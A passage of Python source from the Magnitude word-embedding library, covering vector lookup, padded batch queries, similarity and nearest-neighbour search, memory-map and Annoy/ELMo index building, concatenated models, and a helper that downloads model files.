def _vectors_for_2d_keys(self, keys2d, normalized=None):
"""Queries the database for 2D keys."""
normalized = normalized if normalized is not None else self.normalized
if self._is_lm():
# Only language models benefit from this kind of 2D batching,
# SQLite is slightly faster with more batching, but it also has
# a turning point where that changes
keys2d = [[self._key_t(key) for key in keys] for keys in keys2d]
return self._process_lm_output(keys2d, normalized)
else:
return (self._vectors_for_keys_cached(row, normalized)
for row in keys2d)
def _key_for_index(self, index, return_vector=True):
"""Queries the database the key at a single index."""
columns = "key"
if return_vector:
columns = "*"
result = self._db().execute(
"""
SELECT """ + columns + """
FROM `magnitude`
WHERE rowid = ?
LIMIT 1;
""",
(int(index + 1),)).fetchone()
if result is None:
raise IndexError("The index %d is out-of-range" % index)
else:
if return_vector:
return self._db_full_result_to_vec(
result)
else:
return result[0]
def _keys_for_indices(self, indices, return_vector=True):
"""Queries the database for the keys of multiple indices."""
unseen_indices = tuple(int(index + 1) for index in indices
if self._key_for_index_cached._cache.get(((index,), # noqa
frozenset([('return_vector', return_vector)]))) is None) # noqa
unseen_indices_map = {}
if len(unseen_indices) > 0:
columns = "key"
if return_vector:
columns = "*"
unseen_indices_map = {(index - 1): i for i, index in
enumerate(unseen_indices)}
unseen_keys = [None] * len(unseen_indices)
for unseen_indices_batch in \
self._db_batch_generator(unseen_indices):
results = self._db().execute(
"""
SELECT rowid, """ + columns + """
FROM `magnitude`
WHERE rowid IN (""" +
' ,'.join(['?'] * len(unseen_indices_batch)) +
""");""",
unseen_indices_batch)
for result in results:
i = unseen_indices_map[result[0] - 1]
result_key = result[1]
if return_vector:
unseen_keys[i] = self._db_full_result_to_vec(
result[1:])
else:
unseen_keys[i] = result_key
self._key_for_index_cached._cache.put(
(
(unseen_indices[i] - 1,),
frozenset([('return_vector', return_vector)])
),
unseen_keys[i]
)
for i in range(len(unseen_keys)):
if unseen_keys[i] is None:
raise IndexError("The index %d is out-of-range" %
unseen_indices[i] - 1)
keys = [self.index(index, return_vector=return_vector)
if index not in unseen_indices_map else
unseen_keys[unseen_indices_map[index]] for index in indices]
return keys
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def query(self, q, pad_to_length=None,
pad_left=None, truncate_left=None,
normalized=None):
"""Handles a query of keys which could be a single key, a
1-D list of keys, or a 2-D list of keys.
"""
normalized = normalized if normalized is not None else self.normalized
pad_to_length = pad_to_length or self.pad_to_length
pad_left = pad_left or self.pad_left
truncate_left = truncate_left or self.truncate_left
if not isinstance(q, list): # Single key
vec = self._vector_for_key_cached(q, normalized=normalized)
if vec is None:
return self._out_of_vocab_vector_cached(q, normalized=normalized)
else:
return vec
elif isinstance(q, list) \
and (len(q) == 0 or not isinstance(q[0], list)): # 1D list
pad_to_length = pad_to_length if pad_to_length else len(q)
padding_length = max(pad_to_length - len(q), 0)
keys_length = pad_to_length - padding_length
vectors = self._vectors_for_keys_cached(q, normalized)
if truncate_left:
vectors = vectors[-keys_length:]
else:
vectors = vectors[0:keys_length]
if self.use_numpy:
tensor = np.zeros((pad_to_length, self.dim), dtype=self.dtype)
else:
tensor = [self._padding_vector() for i in range(pad_to_length)]
if pad_left:
tensor[-keys_length:] = vectors
else:
tensor[0:keys_length] = vectors
return tensor
elif isinstance(q, list): # 2D List
max_q = max([len(subquery) for subquery in q])
pad_to_length = pad_to_length if pad_to_length else max_q
if self.use_numpy:
tensor = np.zeros((len(q), pad_to_length, self.dim),
dtype=self.dtype)
else:
tensor = [[self._padding_vector() for i in range(pad_to_length)]
for j in range(len(q))]
for row, vectors in \
enumerate(self._vectors_for_2d_keys(q, normalized)):
padding_length = max(pad_to_length - len(vectors), 0)
keys_length = pad_to_length - padding_length
if truncate_left:
vectors = vectors[-keys_length:]
else:
vectors = vectors[0:keys_length]
if pad_left:
if self.use_numpy:
tensor[row, -keys_length:] = vectors
else:
tensor[row][-keys_length:] = vectors
else:
if self.use_numpy:
tensor[row, 0:keys_length] = vectors
else:
tensor[row][0:keys_length] = vectors
return tensor
def unroll(self, v):
""" Unrolls a vector if it was concatenated from its base model
form. """
if self.elmo and isinstance(v, np.ndarray):
return unroll_elmo(v, self.placeholders)
else:
return v
def index(self, q, return_vector=True):
"""Gets a key for an index or multiple indices."""
if isinstance(q, list) or isinstance(q, tuple):
return self._keys_for_indices(q, return_vector=return_vector)
else:
return self._key_for_index_cached(q, return_vector=return_vector)
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def _query_numpy(self, key, contextualize=False, normalized=None):
"""Returns the query for a key, forcibly converting the
resulting vector to a numpy array.
"""
normalized = normalized if normalized is not None else self.normalized
if contextualize:
key = [[sq] for sq in key]
key_is_ndarray = isinstance(key, np.ndarray)
key_is_list = isinstance(key, list)
key_len_ge_0 = key_is_list and len(key) > 0
key_0_is_number = key_len_ge_0 and isinstance(key[0], Number)
key_0_is_ndarray = key_len_ge_0 and isinstance(key[0], np.ndarray)
key_0_is_list = key_len_ge_0 and isinstance(key[0], list)
key_0_len_ge_0 = key_0_is_list and len(key[0]) > 0
key_0_0_is_number = (key_0_is_list and key_0_len_ge_0 and
isinstance(key[0][0], Number))
r_val = None
if (key_is_ndarray or key_0_is_number or key_0_is_ndarray or key_0_0_is_number): # noqa
r_val = key
elif not self.use_numpy:
r_val = np.asarray(self.query(key, normalized=normalized))
else:
r_val = self.query(key, normalized=normalized)
if contextualize:
return np.squeeze(r_val, axis=1)
else:
return r_val
def _query_cached(self, key, normalized=None, force=False):
"""Checks if the query been cached by Magnitude."""
normalized = normalized if normalized is not None else self.normalized
cached = self._vector_for_key_cached._cache.get(((key,), frozenset([('normalized', normalized)])))
if cached is not None:
return cached
return self._out_of_vocab_vector_cached._cache.get(((key,), frozenset([('normalized', normalized), ('force', force)])))
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def distance(self, key, q):
"""Calculates the distance from key to the key(s) in q."""
a = self._query_numpy(key, normalized=self.normalized)
if not isinstance(q, list):
b = self._query_numpy(q, normalized=self.normalized)
return np.linalg.norm(a - b)
else:
return [
np.linalg.norm(
a -
b) for b in self._query_numpy(
q,
contextualize=True,
normalized=self.normalized)]
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def similarity(self, key, q):
"""Calculates the similarity from key to the key(s) in q."""
a = self._query_numpy(key, normalized=True)
if not isinstance(q, list):
b = self._query_numpy(q, normalized=True)
return np.inner(a, b) / (np.linalg.norm(a) * np.linalg.norm(b))
else:
return [np.inner(a, b) / (np.linalg.norm(a) * np.linalg.norm(b))
for b in self._query_numpy(q,
contextualize=True,
normalized=True)]
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def most_similar_to_given(self, key, q):
"""Calculates the most similar key in q to key."""
similarities = self.similarity(key, q)
min_index, _ = max(enumerate(similarities), key=operator.itemgetter(1))
return q[min_index]
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def doesnt_match(self, q):
"""Given a set of keys, figures out which key doesn't
match the rest.
"""
mean_vector = np.mean(self._query_numpy(
q, contextualize=True, normalized=True), axis=0)
mean_unit_vector = mean_vector / np.linalg.norm(mean_vector)
distances = [
np.linalg.norm(
mean_unit_vector - b
)
for b in self._query_numpy(q, contextualize=True, normalized=True)]
max_index, _ = max(enumerate(distances), key=operator.itemgetter(1))
return q[max_index]
def _db_query_similarity(
self,
positive,
negative,
min_similarity=None,
topn=10,
exclude_keys=set(),
return_similarities=False,
method='distance',
effort=1.0):
"""Runs a database query to find vectors close to vector."""
COSMUL = method == '3cosmul' # noqa: N806
APPROX = method == 'approx' # noqa: N806
DISTANCE = not COSMUL and not APPROX # noqa: N806
exclude_keys = {self._key_t(exclude_key)
for exclude_key in exclude_keys}
if topn is None:
topn = self.length
filter_topn = self.max_duplicate_keys * (topn + len(exclude_keys))
# Find mean unit vector
if (DISTANCE or APPROX) and (len(negative) > 0 or len(positive) > 1):
positive_vecs = np.sum(
self._query_numpy(
positive,
contextualize=True,
normalized=True),
axis=0)
if len(negative) > 0:
negative_vecs = -1.0 * \
np.sum(self._query_numpy(
negative,
contextualize=True,
normalized=True),
axis=0)
else:
negative_vecs = np.zeros((self.dim,), dtype=self.dtype)
mean_vector = (positive_vecs + negative_vecs) / \
float(len(positive) + len(negative))
mean_unit_vector = mean_vector / np.linalg.norm(mean_vector)
elif (DISTANCE or APPROX):
mean_unit_vector = self._query_numpy(
positive[0], normalized=True)
elif COSMUL:
positive_vecs = self._query_numpy(
positive, contextualize=True, normalized=True)
if len(negative) > 0:
negative_vecs = self._query_numpy(
negative, contextualize=True, normalized=True)
else:
negative_vecs = np.zeros((0, self.dim))
# Calculate topn closest in batches over all vectors
if DISTANCE or COSMUL:
filtered_indices = []
for batch_start, _, batch in \
self.get_vectors_mmap_batch_generator():
if DISTANCE:
similiarities = np.dot(batch, mean_unit_vector)
elif COSMUL:
positive_similiarities = [
((1 + np.dot(batch, vec)) / 2)
for vec in positive_vecs
]
negative_similiarities = [
((1 + np.dot(batch, vec)) / 2)
for vec in negative_vecs
]
similiarities = (
np.prod(positive_similiarities, axis=0) /
(np.prod(negative_similiarities, axis=0) + 0.000001))
partition_results = np.argpartition(similiarities, -1 * min(
filter_topn, self.batch_size, self.length))[-filter_topn:]
for index in partition_results:
if (min_similarity is None or
similiarities[index] >= min_similarity):
if len(filtered_indices) < filter_topn:
heapq.heappush(filtered_indices, (
similiarities[index],
batch_start + index))
elif similiarities[index] > filtered_indices[0][0]:
heapq.heappushpop(filtered_indices, (
similiarities[index],
batch_start + index))
# Get the final topn from all batches
topn_indices = heapq.nlargest(filter_topn, filtered_indices,
key=lambda x: x[0])
topn_indices = iter(topn_indices)
elif APPROX:
approx_index = self.get_approx_index()
search_k = int(effort * filter_topn * self.approx_trees)
nns = approx_index.get_nns_by_vector(
mean_unit_vector,
filter_topn,
search_k=search_k,
include_distances=True)
topn_indices = izip(nns[1], nns[0])
topn_indices = imap(lambda di: (1 - di[0] ** 2 * .5, di[1]),
topn_indices)
# Tee topn_indices iterator
topn_indices_1, topn_indices_2 = tee(topn_indices)
# Retrieve the keys of the vectors
keys = self.index([i[1] for i in topn_indices_1],
return_vector=False)
# Build the result
results = []
for key, similarity in izip(keys, topn_indices_2):
key_t = self._key_t(key)
if len(results) >= topn:
break
if key_t in exclude_keys:
continue
exclude_keys.add(key_t)
if return_similarities:
results.append((key, similarity[0]))
else:
results.append(key)
return results
def _handle_pos_neg_args(self, positive, negative):
if not isinstance(
positive,
list) or (
len(positive) > 0 and isinstance(
positive[0],
Number)):
positive = [positive]
if not isinstance(
negative,
list) or (
len(negative) > 0 and isinstance(
negative[0],
Number)):
negative = [negative]
return positive, negative
def _exclude_set(self, positive, negative):
def _is_vec(elem):
return isinstance(elem, np.ndarray) or \
(isinstance(elem, list) and len(elem) > 0 and
isinstance(elem[0], Number))
return frozenset((elem for elem in chain.from_iterable(
[positive, negative]) if not _is_vec(elem)))
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def most_similar(self, positive, negative=[], topn=10, min_similarity=None,
return_similarities=True):
"""Finds the topn most similar vectors under or equal
to max distance.
"""
positive, negative = self._handle_pos_neg_args(positive, negative)
return self._db_query_similarity(
positive=positive,
negative=negative,
min_similarity=min_similarity,
topn=topn,
exclude_keys=self._exclude_set(
positive,
negative),
return_similarities=return_similarities,
method='distance')
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def most_similar_cosmul(self, positive, negative=[], topn=10,
min_similarity=None, return_similarities=True):
"""Finds the topn most similar vectors under or equal to max
distance using 3CosMul:
[Levy and Goldberg](http://www.aclweb.org/anthology/W14-1618)
"""
positive, negative = self._handle_pos_neg_args(positive, negative)
results = self._db_query_similarity(
positive=positive,
negative=negative,
min_similarity=min_similarity,
topn=topn,
exclude_keys=self._exclude_set(
positive,
negative),
return_similarities=return_similarities,
method='3cosmul')
return results
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def most_similar_approx(
self,
positive,
negative=[],
topn=10,
min_similarity=None,
return_similarities=True,
effort=1.0):
"""Approximates the topn most similar vectors under or equal to max
distance using Annoy:
https://github.com/spotify/annoy
"""
if not self.approx:
raise RuntimeError("The `.magnitude` file you are using does not \
support the `most_similar_approx` function. If you are using a pre-built \
`.magnitude` file, visit Magnitude's git repository page's README and download \
the 'Heavy' model instead. If you converted this `.magnitude` file yourself \
you will need to re-convert the file passing the `-a` flag to the converter to \
build the appropriate indexes into the `.magnitude` file.")
positive, negative = self._handle_pos_neg_args(positive, negative)
effort = min(max(0, effort), 1.0)
results = self._db_query_similarity(
positive=positive,
negative=negative,
min_similarity=min_similarity,
topn=topn,
exclude_keys=self._exclude_set(
positive,
negative),
return_similarities=return_similarities,
method='approx',
effort=effort)
return results
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def closer_than(self, key, q, topn=None):
"""Finds all keys closer to key than q is to key."""
epsilon = (10.0 / 10**6)
min_similarity = self.similarity(key, q) + epsilon
return self.most_similar(key, topn=topn, min_similarity=min_similarity,
return_similarities=False)
def get_vectors_mmap(self, log=True):
"""Gets a numpy.memmap of all vectors, blocks if it is still
being built.
"""
if self._all_vectors is None:
logged = False
while True:
if not self.setup_for_mmap:
self._setup_for_mmap()
try:
if not self.memory_db and self.length > 0:
all_vectors = np.memmap(
self.path_to_mmap, dtype=self.dtype, mode='r',
shape=(self.length, self.dim))
self._all_vectors = all_vectors
else:
all_vectors = np.zeros((0, self.dim))
self._all_vectors = all_vectors
break
except BaseException:
if not logged and log and self.log:
_log("Need to build a memory map. "
"This may take some time...but it only "
"needs to be done once (even between "
"multiple runs of this program). The result"
" will get stashed into a temporary "
"directory on your "
"computer.")
path_to_mmap_temp = self.path_to_mmap + '.tmp'
tlock = self.MMAP_THREAD_LOCK.acquire(False)
plock = self.MMAP_PROCESS_LOCK.acquire(0)
if tlock and plock:
values = imap(
lambda kv: kv[1], self._iter(
put_cache=self.lazy_loading == -1,
downloader=True))
try:
with open(path_to_mmap_temp, "w+b") as mmap_file:
all_vectors = np.memmap(
mmap_file, dtype=self.dtype, mode='w+',
shape=(self.length, self.dim))
last_p = 0
for i, value in enumerate(values):
progress = round((float(i) / float(self.length)) * 100, 2) # noqa
if log and self.log and int(progress) > last_p: # noqa
last_p = int(progress)
_log("Progress: %.2f%%" %
(progress,))
all_vectors[i] = value
all_vectors.flush()
try:
del all_vectors
except BaseException:
pass
if not self.closed:
os.rename(path_to_mmap_temp, self.path_to_mmap)
else:
return
finally:
self.MMAP_THREAD_LOCK.release()
try:
self.MMAP_PROCESS_LOCK.release()
except BaseException:
pass
sleep(1) # Block before trying again
return self._all_vectors
def get_vectors_mmap_batch_generator(self):
"""Gets batches of get_vectors_mmap()."""
all_vectors = self.get_vectors_mmap()
if self.length > self.batch_size:
for i in range(all_vectors.shape[0]):
batch_start = i * self.batch_size
batch_end = min(batch_start + self.batch_size,
all_vectors.shape[0])
if batch_start >= all_vectors.shape[0]:
break
yield (batch_start, batch_end,
all_vectors[batch_start:batch_end])
if batch_end == all_vectors.shape[0]:
break
else:
yield (0, self.length, all_vectors)
def get_approx_index_chunks(self):
"""Gets decompressed chunks of the AnnoyIndex of the vectors from
the database."""
try:
db = self._db(force_new=True, downloader=True)
num_chunks = db.execute(
"""
SELECT COUNT(rowid)
FROM `magnitude_approx`
WHERE trees = ?
""", (self.approx_trees,)).fetchall()[0][0]
with lz4.frame.LZ4FrameDecompressor() as decompressor:
chunks = db.execute(
"""
SELECT rowid,index_file
FROM `magnitude_approx`
WHERE trees = ?
""", (self.approx_trees,))
for chunk in chunks:
yield num_chunks, decompressor.decompress(chunk[1])
if self.closed:
return
except Exception as e:
if self.closed:
pass
else:
raise e
def get_meta_chunks(self, meta_index):
"""Gets decompressed chunks of a meta file embedded in
the database."""
try:
db = self._db(force_new=True, downloader=True)
num_chunks = db.execute(
"""
SELECT COUNT(rowid)
FROM `magnitude_meta_""" + str(meta_index) + """`
""").fetchall()[0][0]
with lz4.frame.LZ4FrameDecompressor() as decompressor:
chunks = db.execute(
"""
SELECT rowid,meta_file
FROM `magnitude_meta_""" + str(meta_index) + """`
""")
for chunk in chunks:
yield num_chunks, decompressor.decompress(chunk[1])
if self.closed:
return
except Exception as e:
if self.closed:
pass
else:
raise e
def get_approx_index(self, log=True):
"""Gets an AnnoyIndex of the vectors from the database."""
chunks = self.get_approx_index_chunks()
if self._approx_index is None:
logged = False
while True:
if not self.setup_for_mmap:
self._setup_for_mmap()
try:
sys.stdout.flush()
sys.stderr.flush()
approx_index = AnnoyIndex(self.emb_dim, metric='angular')
approx_index.load(self.path_to_approx_mmap)
self._approx_index = approx_index
break
except BaseException:
sys.stdout.flush()
sys.stderr.flush()
if not logged and log and self.log:
_log("Need to build the approximate index."
" This may take some time...but it only "
"needs to be done once (even between "
"multiple runs of this program). The result"
" will get stashed into a temporary "
"directory on your "
"computer.")
path_to_approx_mmap_temp = self.path_to_approx_mmap \
+ '.tmp'
tlock = self.APPROX_MMAP_THREAD_LOCK.acquire(False)
plock = self.APPROX_MMAP_PROCESS_LOCK.acquire(0)
if tlock and plock:
try:
with open(path_to_approx_mmap_temp, "w+b") \
as mmap_file:
last_p = 0
for i, (length, chunk) in enumerate(chunks):
progress = round((float(i) / float(length)) * 100, 2) # noqa
if log and self.log and int(progress) > last_p: # noqa
last_p = int(progress)
_log("Progress: %.2f%%" %
(progress,))
mmap_file.write(chunk)
if not self.closed:
os.rename(path_to_approx_mmap_temp,
self.path_to_approx_mmap)
else:
return
finally:
self.APPROX_MMAP_THREAD_LOCK.release()
try:
self.APPROX_MMAP_PROCESS_LOCK.release()
except BaseException:
pass
sleep(1) # Block before trying again
return self._approx_index
def get_elmo_embedder(self, log=True):
"""Gets an ElmoEmbedder of the vectors from the database."""
meta_1_chunks = self.get_meta_chunks(1)
meta_2_chunks = self.get_meta_chunks(2)
if self._elmo_embedder is None:
logged = False
while True:
if not self.setup_for_mmap:
self._setup_for_mmap()
try:
if len(self.devices) > 0:
elmo_embedder = ElmoEmbedder(
self.path_to_elmo_o_mmap, self.path_to_elmo_w_mmap,
cuda_device=self.devices[0])
else:
elmo_embedder = ElmoEmbedder(
self.path_to_elmo_o_mmap, self.path_to_elmo_w_mmap)
self._elmo_embedder = elmo_embedder
break
except BaseException:
if not logged and log and self.log:
_log("Need to build ElmoEmbedder. "
"This may take some time...but it only "
"needs to be done once (even between "
"multiple runs of this program). The result"
" will get stashed into a temporary "
"directory on your "
"computer.")
path_to_elmo_w_mmap_temp = self.path_to_elmo_w_mmap \
+ '.tmp'
path_to_elmo_o_mmap_temp = self.path_to_elmo_o_mmap \
+ '.tmp'
tlock_w = self.ELMO_W_MMAP_THREAD_LOCK.acquire(False)
plock_w = self.ELMO_W_MMAP_PROCESS_LOCK.acquire(0)
tlock_o = self.ELMO_O_MMAP_THREAD_LOCK.acquire(False)
plock_o = self.ELMO_O_MMAP_PROCESS_LOCK.acquire(0)
if tlock_w and plock_w and tlock_o and plock_o:
try:
with open(path_to_elmo_w_mmap_temp, "w+b") \
as mmap_file:
last_p = 0
for i, (length, chunk) \
in enumerate(meta_1_chunks):
progress = round((float(i) / float(length)) * 100, 2) # noqa
if log and self.log and int(progress) > last_p: # noqa
last_p = int(progress)
_log("Progress: %.2f%%" %
(progress,))
mmap_file.write(chunk)
if not self.closed:
os.rename(path_to_elmo_w_mmap_temp,
self.path_to_elmo_w_mmap)
else:
return
with open(path_to_elmo_o_mmap_temp, "w+b") \
as mmap_file:
for _, chunk in meta_2_chunks:
mmap_file.write(chunk)
if not self.closed:
os.rename(path_to_elmo_o_mmap_temp,
self.path_to_elmo_o_mmap)
else:
return
finally:
self.ELMO_W_MMAP_THREAD_LOCK.release()
try:
self.ELMO_W_MMAP_PROCESS_LOCK.release()
except BaseException:
pass
self.ELMO_O_MMAP_THREAD_LOCK.release()
try:
self.ELMO_O_MMAP_PROCESS_LOCK.release()
except BaseException:
pass
sleep(1) # Block before trying again
return self._elmo_embedder
def _iter(self, put_cache, downloader=False):
"""Yields keys and vectors for all vectors in the store."""
try:
db = self._db(force_new=True, downloader=downloader)
results = db.execute(
"""
SELECT *
FROM `magnitude`
""")
for result in results:
yield self._db_full_result_to_vec(result, put_cache=put_cache)
if self.closed:
return
except Exception as e:
if self.closed:
pass
else:
raise e
def __iter__(self):
"""Yields keys and vectors for all vectors in the store."""
return self._iter(put_cache=True)
def __len__(self):
"""Returns the number of vectors."""
return self.length
def __contains__(self, key):
"""Checks whether a key exists in the vectors"""
return self._vector_for_key_cached(key, normalized=self.normalized) is not None
def __getitem__(self, q):
"""Performs the index method when indexed."""
if isinstance(q, slice):
return self.index(list(range(*q.indices(self.length))),
return_vector=True)
else:
return self.index(q, return_vector=True)
def close(self):
"""Cleans up the object"""
self.closed = True
while any([t.is_alive() for t in self._threads]):
sleep(.5)
for conn in self._all_conns:
try:
conn.close()
except Exception:
pass
if hasattr(self, 'fd'):
try:
os.close(self.fd)
except BaseException:
pass
try:
self._all_vectors._mmap.close()
except BaseException:
pass
try:
del self._all_vectors
gc.collect()
except BaseException:
pass
try:
self._approx_index.unload()
except BaseException:
pass
if (hasattr(self, 'MMAP_PROCESS_LOCK') and
hasattr(self.MMAP_PROCESS_LOCK, 'lockfile') and
self.MMAP_PROCESS_LOCK.lockfile is not None):
try:
self.MMAP_PROCESS_LOCK.lockfile.close()
except BaseException:
pass
if (hasattr(self, 'APPROX_MMAP_PROCESS_LOCK') and
hasattr(self.APPROX_MMAP_PROCESS_LOCK, 'lockfile') and
self.APPROX_MMAP_PROCESS_LOCK.lockfile is not None):
try:
self.APPROX_MMAP_PROCESS_LOCK.lockfile.close()
except BaseException:
pass
if (hasattr(self, 'ELMO_W_MMAP_PROCESS_LOCK') and
hasattr(self.ELMO_W_MMAP_PROCESS_LOCK, 'lockfile') and
self.ELMO_W_MMAP_PROCESS_LOCK.lockfile is not None):
try:
self.ELMO_W_MMAP_PROCESS_LOCK.lockfile.close()
except BaseException:
pass
if (hasattr(self, 'ELMO_O_MMAP_PROCESS_LOCK') and
hasattr(self.ELMO_O_MMAP_PROCESS_LOCK, 'lockfile') and
self.ELMO_O_MMAP_PROCESS_LOCK.lockfile is not None):
try:
self.ELMO_O_MMAP_PROCESS_LOCK.lockfile.close()
except BaseException:
pass
def __del__(self):
""" Destructor for the class """
try:
self.close()
except BaseException:
pass
class FeaturizerMagnitude(Magnitude):
"""A FeaturizerMagnitude class that subclasses Magnitude and acts as
a way to featurize arbitrary python
Attributes:
number_of_values: number_of_values should be set to the
approximate upper-bound of the number of
feature values that will be looked up with query().
If you don't know the exact number, be conservative
and pick a large number, while keeping in mind the
bigger number_of_values is, the more memory it will
consume
namespace: an optional namespace that will be prepended to each query
if provided
"""
def __init__(self, number_of_values=1000000, namespace=None, **kwargs):
self.namespace = namespace
super(
FeaturizerMagnitude,
self).__init__(
None,
_number_of_values=number_of_values,
_namespace=self.namespace,
**kwargs)
class ConcatenatedMagnitude(object):
"""A ConcatenatedMagnitude class that acts as a concatenated interface
to querying multiple magnitude objects.
Attributes:
*args: each arg should be a Magnitude object
"""
def __init__(self, *args, **kwargs):
if len(args) < 2:
raise RuntimeError(
"Must concatenate at least 2 Magnitude objects.")
self.magnitudes = args
self.dim = sum([m.dim for m in self.magnitudes])
all_use_numpy = [m.use_numpy for m in self.magnitudes]
if not all(use_numpy == all_use_numpy[0]
for use_numpy in all_use_numpy):
raise RuntimeError(
"All magnitude objects must have the same use_numpy value.")
self.use_numpy = all_use_numpy[0]
def _take(self, q, multikey, i):
"""Selects only the i'th element from the inner-most axis and
reduces the dimensions of the tensor q by 1.
"""
if multikey == -1:
return q
else:
cut = np.take(q, [i], axis=multikey)
result = np.reshape(cut, np.shape(cut)[0:-1]).tolist()
return result
def _hstack(self, l, use_numpy):
"""Horizontally stacks NumPy arrays or Python lists"""
if use_numpy:
return np.concatenate(l, axis=-1)
else:
return list(chain.from_iterable(l))
def _dstack(self, l, use_numpy):
"""Depth stacks NumPy arrays or Python lists"""
if use_numpy:
return np.concatenate(l, axis=-1)
else:
return [self._hstack((l3[example] for l3 in l),
use_numpy=use_numpy) for example in xrange(len(l[0]))] # noqa
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def query(self, q, pad_to_length=None,
pad_left=None, truncate_left=None,
normalized=None):
"""Handles a query of keys which could be a single key, a
1-D list of keys, or a 2-D list of keys.
"""
# Check if keys are specified for each concatenated model
multikey = -1
if isinstance(q, tuple):
multikey = 0
if isinstance(q, list) and isinstance(q[0], tuple):
multikey = 1
if (isinstance(q, list) and isinstance(q[0], list) and
isinstance(q[0][0], tuple)):
multikey = 2
# Define args
pad_to_length = pad_to_length or self.magnitudes[0].pad_to_length
pad_left = pad_left or self.magnitudes[0].pad_left
truncate_left = truncate_left or self.magnitudes[0].truncate_left
# Query each model with the right set of keys
v = [m.query(self._take(q, multikey, i), normalized=(
normalized if normalized is not None else m.normalized
))
for i, m in enumerate(self.magnitudes)]
if not isinstance(q, list): # Single key
return self._hstack(v, self.use_numpy)
elif isinstance(q, list) \
and (len(q) == 0 or not isinstance(q[0], list)): # 1D list
return self._hstack(v, self.use_numpy)
elif isinstance(q, list): # 2D List
return self._dstack(v, self.use_numpy)
class MagnitudeUtils(object):
"""A MagnitudeUtils class that contains static helper utilities."""
@staticmethod
def download_model(
model,
download_dir=os.path.expanduser('~/.magnitude/'),
remote_path='http://magnitude.plasticity.ai/',
log=False,
_download=True,
_local=False):
""" Downloads a remote Magnitude model locally (if it doesn't already
exist) and synchronously returns the local file path once it has
been completed """
# Clean the inputs
orig_model = model
if model.endswith('.magnitude'):
model = model[:-10]
if model.startswith('http://') or model.startswith('https://'):
remote_path = ''
if model.startswith('http://magnitude.plasticity.ai/'):
model = model.replace('http://magnitude.plasticity.ai/', '')
remote_path = 'http://magnitude.plasticity.ai/'
if model.startswith('https://magnitude.plasticity.ai/'):
model = model.replace('https://magnitude.plasticity.ai/', '')
remote_path = 'https://magnitude.plasticity.ai/'
if not remote_path.endswith('/') and len(remote_path) > 0:
remote_path = remote_path + '/'
# Local download
local_file_name = model.replace('/', '_') + '.magnitude'
local_file_name_tmp = model.replace('/', '_') + '.magnitude.tmp'
remote_file_path = remote_path + model + '.magnitude'
if not _download:
return remote_file_path
# Make the download directories
try:
os.makedirs(download_dir)
except OSError:
if not os.path.isdir(download_dir):
raise RuntimeError("The download folder is not a folder.")
if not os.path.isfile(os.path.join(download_dir, local_file_name)):
try:
if log:
_log("Downloading '.magnitude' file..."
"this may take some time. If you want "
"to stream the model, pass stream=True "
"to the Magnitude constructor instead."
"This only needs to happen once.")
urlretrieve(
remote_file_path,
os.path.join(download_dir, local_file_name_tmp)
)
conn = sqlite3.connect(
os.path.join(
download_dir,
local_file_name_tmp))
conn.cursor().execute("SELECT * FROM magnitude_format")
conn.close()
os.rename(
os.path.join(
download_dir,
local_file_name_tmp),
os.path.join(
download_dir,
local_file_name))
except BaseException:
if _local:
raise RuntimeError(
"The path to the Magnitude file at '" + orig_model + "' could not be found. Also failed to find a valid remote model at the following URL: " + # noqa
remote_file_path)
else:
raise RuntimeError(
"The download could not be completed. Are you sure a valid model exists at the following URL: " + # noqa
remote_file_path)
return os.path.join(download_dir, local_file_name)
@staticmethod
def batchify(X, y, batch_size): # noqa: N803
""" Creates an iterator that chunks `X` and `y` into batches
that each contain `batch_size` elements and loops forever"""
X_batch_generator = cycle([X[i: i + batch_size] # noqa: N806
for i in xrange(0, len(X), batch_size)])
y_batch_generator = cycle([y[i: i + batch_size]
for i in xrange(0, len(y), batch_size)])
return izip(X_batch_generator, y_batch_generator)
@staticmethod
def class_encoding():
"""Creates a set of functions to add a new class, convert a
class into an integer, and the integer back to a class."""
class_to_int_map = {}
int_to_class_map = None
def add_class(c):
global int_to_class_map
int_to_class_map = None
return class_to_int_map.setdefault(
c, len(class_to_int_map))
def class_to_int(c):
return class_to_int_map[c]
def int_to_class(i):
global int_to_class_map
if int_to_class_map is None:
int_to_class_map = {v: k
for k, v in (
(
hasattr(class_to_int_map, 'iteritems') and # noqa
class_to_int_map.iteritems
) or
class_to_int_map.items
)()}
return int_to_class_map[i]
return add_class, class_to_int, int_to_class
@staticmethod
def to_categorical(y, num_classes=None):
"""Converts a class vector (integers) to binary class matrix.
"""
y = np.array(y, dtype='int')
input_shape = y.shape
if input_shape and input_shape[-1] == 1 and len(input_shape) > 1:
input_shape = tuple(input_shape[:-1])
y = y.ravel()
if not num_classes:
num_classes = np.max(y) + 1
n = y.shape[0]
categorical = np.zeros((n, num_classes), dtype=np.float32)
categorical[np.arange(n), y] = 1
output_shape = input_shape + (num_classes,)
categorical = np.reshape(categorical, output_shape)
return categorical
@staticmethod
def from_categorical(categorical):
"""Converts a binary class matrix to a class vector (integers)"""
return np.argmax(categorical, axis=1)
if _APSW_LIB == 'internal':
class HTTPVFSFileCache():
""" This cache sort of acts like a predictor for sequential
network reads. It proactively pulls in more data than
requested from the network if it sees a pattern of sequential
reads. The amount of data predictively pulled is
adjusts based on the last few true sequential reads.
"""
def __init__(self, vfsfile):
self.vfsfile = vfsfile
self.cache_size = None
self._start_offset = 0
self.running_hit_direction = 0
self.running_hit_last_start = float("inf")
self.running_hit_last_end = 0
self.running_forward_hit_amount = 0
self.running_backward_hit_amount = 0
self.running_hit_amount = 0
self.time = time.time()
self.id = uuid.uuid4().int
self.data = "".encode('utf-8')
def length_of_data(self):
"""Returns the length of the cached data."""
return len(self.data)
def get_data(self):
"""Returns the cached data."""
return self.data
def set_data(self, data):
"""Sets the cached data."""
